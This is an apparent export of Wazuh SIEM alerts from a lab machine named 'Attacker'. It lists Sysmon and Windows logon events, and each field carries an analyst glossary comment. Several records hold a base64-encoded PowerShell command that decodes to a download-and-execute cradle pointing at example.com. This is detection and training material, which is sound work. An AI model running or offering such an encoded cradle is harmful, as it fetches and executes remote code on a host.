data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd10-680a-300b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 8832 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 50 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534232.1337837 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:09.2215671Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283487 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:09.193
ProcessGuid: {94294ddc-bd13-680a-340b-000000000e00}
ProcessId: 11044
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_vpgzfelx.hvu.ps1
CreationUtcTime: 2025-04-24 22:37:09.193
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:09.193 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd13-680a-340b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 11044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_vpgzfelx.hvu.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:09.193 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Powershell.exe spawned a powershell process which executed a base64 encoded command Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92057 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1059.001'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Execution'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['PowerShell'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 47 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid1_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534234.1340606 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 1 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 1 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:12.5940581Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283514 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "Process Create:
RuleName: -
UtcTime: 2025-04-24 22:37:10.461
ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00}
ProcessId: 13184
Image: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
FileVersion: 10.0.26100.3323 (WinBuild.160101.0800)
Description: Windows PowerShell
Product: Microsoft® Windows® Operating System
Company: Microsoft Corporation
OriginalFileName: PowerShell.EXE
CommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
CurrentDirectory: C:\Users\Attcker1\
User: Attacker\Attcker1
LogonGuid: {94294ddc-ea85-67fe-8465-020000000000}
LogonId: 0x26584
TerminalSessionId: 1
IntegrityLevel: Medium
Hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC
ParentProcessGuid: {94294ddc-bd13-680a-340b-000000000e00}
ParentProcessId: 11044
ParentImage: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
ParentCommandLine: "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" "C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA
ParentUser: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:10.461 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd16-680a-360b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.fileVersion: 10.0.26100.3323 (WinBuild.160101.0800) No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.description: Windows PowerShell No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.product: Microsoft® Windows® Operating System No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.company: Microsoft Corporation No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.originalFileName: PowerShell.EXE No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.commandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.currentDirectory: C:\\Users\\Attcker1\\ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {94294ddc-ea85-67fe-8465-020000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonId: 0x26584 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.terminalSessionId: 1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.integrityLevel: Medium No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.hashes: SHA256=75F490D70F821AFBBBB28D8AE45FA712C0EF39F73832AF5FF0DF284BEB22A9FC No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessGuid: {94294ddc-bd13-680a-340b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentProcessId: 11044 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentImage: C:\\Windows\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentCommandLine: \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" \"C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe\" -NoLogo -NoProfile -EncodedCommand SQBFAFgAKABOAGUAdwAtAE8AYgBqAGUAYwB0ACAATgBlAHQALgBXAGUAYgBDAGwAaQBlAG4AdAApAC4ARABvAHcAbgBsAG8AYQBkAFMAdAByAGkAbgBnACgAJwBoAHQAdABwAHMAOgAvAC8AZQB4AGEAbQBwAGwAZQAuAGMAbwBtAC8AdABlAHMAdAAnACkA No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.parentUser: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
rule.description: Executable file dropped in folder commonly used by malware Human‑readable summary of why the rule fired. Read this first—treat it as the alert’s headline.
rule.id: 92213 Numeric ID of the detection rule that fired.
rule.mitre.id: ['T1105'] List of ATT&CK IDs matched (e.g., T1059). If you see High‑risk IDs like T1059, T1105, T1547, act fast.
rule.mitre.tactic: ['Command and Control'] ATT&CK goal category (Execution, Priv‑Esc, etc.). Tells you WHY an attacker is doing this.
rule.mitre.technique: ['Ingress Tool Transfer'] Specific technique name (e.g., PowerShell). Shows the HOW.
rule.firedtimes: 51 How many times this exact rule hit during aggregation. High = repetitive behaviour.
rule.mail: True True if the rule is configured to email someone – legacy but can warn you of high value detections.
rule.groups: ['sysmon', 'sysmon_eid11_detections', 'windows'] Tags attached to the rule (malware, sysmon_eid1, etc.). Handy for quick pivots.
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534235.1348677 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Sysmon No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {5770385f-c22a-43e0-bf4c-06f5698ffbd9} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 11 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 2 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 4 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 11 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8000000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:12.9778604Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 283516 Incremental log record number – handy for timeline order.
data.win.system.processID: 3712 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4740 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Microsoft-Windows-Sysmon/Operational No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: INFORMATION TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "File created:
RuleName: -
UtcTime: 2025-04-24 22:37:12.860
ProcessGuid: {94294ddc-bd16-680a-360b-000000000e00}
ProcessId: 13184
Image: C:\WINDOWS\System32\WindowsPowerShell\v1.0\powershell.exe
TargetFilename: C:\Users\Attcker1\AppData\Local\Temp\__PSScriptPolicyTest_yudgrlaq.1ii.ps1
CreationUtcTime: 2025-04-24 22:37:12.860
User: Attacker\Attcker1" No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.utcTime: 2025-04-24 22:37:12.860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processGuid: {94294ddc-bd16-680a-360b-000000000e00} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processId: 13184 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.image: C:\\WINDOWS\\System32\\WindowsPowerShell\\v1.0\\powershell.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetFilename: C:\\Users\\Attcker1\\AppData\\Local\\Temp\\__PSScriptPolicyTest_yudgrlaq.1ii.ps1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.creationUtcTime: 2025-04-24 22:37:12.860 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.user: Attacker\\Attcker1 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534236.1351446 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:14.0705092Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43838 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.authenticationPackageName: Negotiate No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonGuid: {00000000-0000-0000-0000-000000000000} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.keyLength: 0 Key length used during logon (e.g., 128‑bit). Weak keys = downgrade attacks.
data.win.eventdata.processId: 0x304 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.processName: C:\\Windows\\System32\\services.exe No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.impersonationLevel: %%1833 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.virtualAccount: %%1843 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLinkedLogonId: 0x0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.elevatedToken: %%1842 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
location: EventChannel Which log source produced the event (e.g., sysmon, auditd).
agent.id: 001 Internal numeric ID that Wazuh gives the endpoint. Use it to look up that machine in the agent list.
agent.name: Attacker Hostname of the source machine. Handy when matching with AD or your CMDB.
agent.ip: 192.168.6.131 The IP address seen by Wazuh. Public or unknown private ranges are red‑flags for pivots.
manager.name: server1 Name of the Wazuh manager node that processed the alert – useful in multi‑node clusters.
id: 1745534236.1358783 Wazuh’s unique alert ID. Pop it in Kibana to pull the raw doc in one click.
decoder.name: windows_eventchannel Name of the Wazuh decoder that parsed this raw log.
data.win.system.providerName: Microsoft-Windows-Security-Auditing No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.providerGuid: {54849625-5478-4994-a5ba-3e3b0328c30d} No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventID: 4624 Classic Windows Event ID (4624, 4688, etc.). Learn the big ones!
data.win.system.version: 3 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.level: 0 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.task: 12544 Windows task category (Logon, Policy Change, etc.).
data.win.system.opcode: 0 Low‑level opcode number (start/stop). Only needed in deep forensics.
data.win.system.keywords: 0x8020000000000000 Bit‑flag keywords set by Windows – rarely critical but good for filtering.
data.win.system.systemTime: 2025-04-24T22:37:14.2143896Z No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.eventRecordID: 43840 Incremental log record number – handy for timeline order.
data.win.system.processID: 792 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.threadID: 4968 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.channel: Security No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.computer: Attacker No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.system.severityValue: AUDIT_SUCCESS TEXT severity (INFO, WARNING, ERROR).
data.win.system.message: "An account was successfully logged on.
Subject:
Security ID: S-1-5-18
Account Name: ATTACKER$
Account Domain: WORKGROUP
Logon ID: 0x3E7
Logon Information:
Logon Type: 5
Restricted Admin Mode: -
Remote Credential Guard: -
Virtual Account: No
Elevated Token: Yes
Impersonation Level: Impersonation
New Logon:
Security ID: S-1-5-18
Account Name: SYSTEM
Account Domain: NT AUTHORITY
Logon ID: 0x3E7
Linked Logon ID: 0x0
Network Account Name: -
Network Account Domain: -
Logon GUID: {00000000-0000-0000-0000-000000000000}
Process Information:
Process ID: 0x304
Process Name: C:\Windows\System32\services.exe
Network Information:
Workstation Name: -
Source Network Address: -
Source Port: -
Detailed Authentication Information:
Logon Process: Advapi
Authentication Package: Negotiate
Transited Services: -
Package Name (NTLM only): -
Key Length: 0
This event is generated when a logon session is created. It is generated on the computer that was accessed.
The subject fields indicate the account on the local system which requested the logon. This is most commonly a service such as the Server service, or a local process such as Winlogon.exe or Services.exe.
The logon type field indicates the kind of logon that occurred. The most common types are 2 (interactive) and 3 (network).
The New Logon fields indicate the account for whom the new logon was created, i.e. the account that was logged on.
The network fields indicate where a remote logon request originated. Workstation name is not always available and may be left blank in some cases.
The impersonation level field indicates the extent to which a process in the logon session can impersonate.
The authentication information fields provide detailed information about this specific logon request.
- Logon GUID is a unique identifier that can be used to correlate this event with a KDC event.
- Transited services indicate which intermediate services have participated in this logon request.
- Package name indicates which sub-protocol was used among the NTLM protocols.
- Key length indicates the length of the generated session key. This will be 0 if no session key was requested." No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectUserName: ATTACKER$ No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectDomainName: WORKGROUP No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.subjectLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserSid: S-1-5-18 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetUserName: SYSTEM No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetDomainName: NT AUTHORITY No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.targetLogonId: 0x3e7 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonType: 5 No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
data.win.eventdata.logonProcessName: Advapi No explanation yet – likely niche or custom. Treat like raw data until the team documents it.
